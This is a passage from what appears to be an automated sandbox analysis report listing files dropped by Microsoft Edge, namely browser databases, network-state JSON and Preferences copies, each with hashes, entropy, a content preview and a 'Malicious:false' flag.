                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.1373098881182175
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:48:TsKLopF+SawLUO1Xj8BWTzsYO4RXbVdA1wN5VGL:te+AuUGjos
                                                                                                                                                                                                                                                                                                                        MD5:AA4F3A6F439687573C3AA3DABB60BDBE
                                                                                                                                                                                                                                                                                                                        SHA1:49B1C65B5C86939C39268EFC29640EBF3B60E5A7
                                                                                                                                                                                                                                                                                                                        SHA-256:210BC5C0F99FB57314FA980670935435079E571008E7E354F53C258FAAD53C0E
                                                                                                                                                                                                                                                                                                                        SHA-512:5B34A67B8474B04316924209AE506A1B9BF825299F410078239BA373DD3093DBA753EE96CFD9EA99908A7AED004BF2D2703F9598AAC6AED13BA74A358C7DCF0A
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1452
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.287213485277577
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n7:YcCpWsktsHnfc7CvsfgCgakhYhbm
                                                                                                                                                                                                                                                                                                                        MD5:093E3F0EA7D5CE1697260321E93C95EB
                                                                                                                                                                                                                                                                                                                        SHA1:6D262FF62829A9F3990AFC80B9F457A1F345290C
                                                                                                                                                                                                                                                                                                                        SHA-256:76CC4ABA0355B54B8694788A7DAD9C08FA1F6413DFCEE7A666D95A69C7A16A60
                                                                                                                                                                                                                                                                                                                        SHA-512:2419B824319070C466335A90D9FAB94B9734245C1A58F4E3452BC7952D29FC346A04ECA62F549047EC26189C0386A07E7120466A7A78474CDF19280457804F4F
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF4af86.TMP (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1452
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.287213485277577
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n7:YcCpWsktsHnfc7CvsfgCgakhYhbm
                                                                                                                                                                                                                                                                                                                        MD5:093E3F0EA7D5CE1697260321E93C95EB
                                                                                                                                                                                                                                                                                                                        SHA1:6D262FF62829A9F3990AFC80B9F457A1F345290C
                                                                                                                                                                                                                                                                                                                        SHA-256:76CC4ABA0355B54B8694788A7DAD9C08FA1F6413DFCEE7A666D95A69C7A16A60
                                                                                                                                                                                                                                                                                                                        SHA-512:2419B824319070C466335A90D9FAB94B9734245C1A58F4E3452BC7952D29FC346A04ECA62F549047EC26189C0386A07E7120466A7A78474CDF19280457804F4F
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):36864
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.114663840195758
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBnHg:uIEumQv8m1ccnvS6nfH0cI9Cj1a
                                                                                                                                                                                                                                                                                                                        MD5:B99DC083F5EFEEB9560C208F02163FAA
                                                                                                                                                                                                                                                                                                                        SHA1:F3AA0916060B9F28542D6DE482B64047C89B8457
                                                                                                                                                                                                                                                                                                                        SHA-256:3EA8A23816F977AF80539E75DC760295775F352D6B65DE678F2420E91C3B9908
                                                                                                                                                                                                                                                                                                                        SHA-512:1C46E2083EB9BAD7C6021C94F5ED360C5D603A7817D3A30F9AD1D2DDFB7645EFEECB245C9AAB0708504E92CEE065EAF51BCDF4F297A5A21CE3A988984EE8CFC5
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3a058.TMP (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3ca65.TMP (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3cf47.TMP (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\dd048f37-01a5-41e8-819d-5e44daa85524.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\e9597542-beca-4bda-877b-34c54b28d2cc.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\f96fac77-91ac-4faf-9891-6d49ab820847.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.6949007314891732
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:TLSnAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3isal/d0dtdjiG1dMgrfNr:TLSOUOq0afDdWec9sJrl7ZWI7J5fc
                                                                                                                                                                                                                                                                                                                        MD5:52DE909D04514C10D7428B67A26BBDAC
                                                                                                                                                                                                                                                                                                                        SHA1:0371737559133042EBF793502ECDC403011376E4
                                                                                                                                                                                                                                                                                                                        SHA-256:B05BF68A882F04103FA0F53A61974AFB591B09010DDBD5139B67B9ECE073F388
                                                                                                                                                                                                                                                                                                                        SHA-512:A1A861BBE3D275229BD39E11A72D894D9838145876FB40D1E233D1637F26BD5C13FBCF329D7984E0F89C3D69D1177E0E852C47B2404AC4A161101EA6ED0C7DE0
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Pdf\pdfSQLite

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):6144
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.773843480059865
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:llBtlEuWk8rlnHpywFBDBjDMEF4gLuumwf7ImWP9K+A7iqxLpJO7LFsjBDvqhs2Y:LBtiuWkKcwF11DM/FAf4ADLnO7L0rqqh
                                                                                                                                                                                                                                                                                                                        MD5:C88D6F67A0DC061BF46439E7A682573B
                                                                                                                                                                                                                                                                                                                        SHA1:9520FD12F0F982C749D54D863CD779D92080748C
                                                                                                                                                                                                                                                                                                                        SHA-256:D2E40C22C6756C8646C27A98A8AE9F508E8F0CCA17ADE6EBFC68B59161ED47C2
                                                                                                                                                                                                                                                                                                                        SHA-512:5D7F8809ED9BD24F24CED816C78AF8A6FF3F45CE02971274E217436C323C434F648379B1B7B71B17B7C9A0A2A846DDA35CB156D6852B2FB472C3CA5DA146C86B
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):9261
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.09800214942593
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:192:stwSjskCUaFvrEmk3V3z88bV+FiAuCU6P/hYJ:stwYskXCDIbGiXp1
                                                                                                                                                                                                                                                                                                                        MD5:BE6FF18F2725E884CE8450DC8EA28035
                                                                                                                                                                                                                                                                                                                        SHA1:D5F01124EB2225AC68DFBF6E7A08593EB9B536CE
                                                                                                                                                                                                                                                                                                                        SHA-256:D6A7E9821195DEC9F115B89E12D8D12932F4C67FF579C9C496C40EF90B0785D5
                                                                                                                                                                                                                                                                                                                        SHA-512:26A6E03BA15B9AF9E76AB09CF6DE946BB30E56CC7F85C10367F751522912AFF18CE360773DB7EF6BC89F35B757BA38CE39FD4BA2A75D092C5C2615A3C8BD5DA1
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326025114093","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_last_update":"13378326024597217","domain_dive

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3dd70.TMP (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):9261
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.09800214942593
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:192:stwSjskCUaFvrEmk3V3z88bV+FiAuCU6P/hYJ:stwYskXCDIbGiXp1
                                                                                                                                                                                                                                                                                                                        MD5:BE6FF18F2725E884CE8450DC8EA28035
                                                                                                                                                                                                                                                                                                                        SHA1:D5F01124EB2225AC68DFBF6E7A08593EB9B536CE
                                                                                                                                                                                                                                                                                                                        SHA-256:D6A7E9821195DEC9F115B89E12D8D12932F4C67FF579C9C496C40EF90B0785D5
                                                                                                                                                                                                                                                                                                                        SHA-512:26A6E03BA15B9AF9E76AB09CF6DE946BB30E56CC7F85C10367F751522912AFF18CE360773DB7EF6BC89F35B757BA38CE39FD4BA2A75D092C5C2615A3C8BD5DA1
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326025114093","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_last_update":"13378326024597217","domain_dive

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF425c4.TMP (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):9261
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.09800214942593
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:192:stwSjskCUaFvrEmk3V3z88bV+FiAuCU6P/hYJ:stwYskXCDIbGiXp1
                                                                                                                                                                                                                                                                                                                        MD5:BE6FF18F2725E884CE8450DC8EA28035
                                                                                                                                                                                                                                                                                                                        SHA1:D5F01124EB2225AC68DFBF6E7A08593EB9B536CE
                                                                                                                                                                                                                                                                                                                        SHA-256:D6A7E9821195DEC9F115B89E12D8D12932F4C67FF579C9C496C40EF90B0785D5
                                                                                                                                                                                                                                                                                                                        SHA-512:26A6E03BA15B9AF9E76AB09CF6DE946BB30E56CC7F85C10367F751522912AFF18CE360773DB7EF6BC89F35B757BA38CE39FD4BA2A75D092C5C2615A3C8BD5DA1
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326025114093","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_last_update":"13378326024597217","domain_dive

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF49b13.TMP (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):9261
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.09800214942593
